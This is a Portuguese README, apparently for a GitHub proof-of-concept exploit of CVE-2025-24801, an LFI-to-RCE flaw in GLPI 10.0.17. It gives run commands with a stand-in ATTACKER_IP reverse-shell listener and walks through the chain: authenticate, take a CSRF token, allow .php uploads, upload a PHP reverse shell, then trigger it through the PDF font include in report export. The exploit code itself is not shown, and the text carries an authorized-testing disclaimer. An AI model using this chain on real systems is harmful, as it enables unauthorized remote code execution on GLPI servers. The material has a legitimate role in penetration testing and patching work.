
Exploração de prova de conceito para CVE-2025-24801, uma vulnerabilidade LFI-para-RCE no GLPI 10.0.17. Automatiza login, habilita uploads PHP e envia um shell reverso para testes de segurança autorizados.
Este repositório contém um script de prova de conceito (poc.py) que explora CVE-2025-24801, uma vulnerabilidade LFI-para-RCE no GLPI 10.0.17. Ele automatiza:
.php atualizando as configurações de tipo de documentogit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: URL base da instância GLPI (ex.: )https://example.com/glpi--user / --password: Credenciais válidas de técnico GLPI--lhost / --lport: IP e porta do atacante para o listener do shell reversoO script usa automaticamente --doc-id 1 como padrão para atualizar o primeiro tipo de documento.
Após a execução, o script irá:
.php atualizando o tipo de documento ID 1exploit.php contendo um payload de shell reverso PHPVocê precisará então acionar manualmente o LFI especificando o nome do arquivo enviado no include da fonte PDF (ex.: via funcionalidade de exportação de relatório) para alcançar RCE.
/front/login.php e envia as credenciais para autenticar./front/documenttype.form.php?id=1, analisa o token CSRF e adiciona php às extensões permitidas./front/ticket.form.php para um token CSRF, depois usa /ajax/fileupload.php (com X-Requested-With: XMLHttpRequest) para enviar um shell reverso PHP.pdffont durante a exportação do relatório.Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. Não a utilize contra sistemas sem permissão explícita.
Criado para fins educacionais e de teste de penetração autorizados.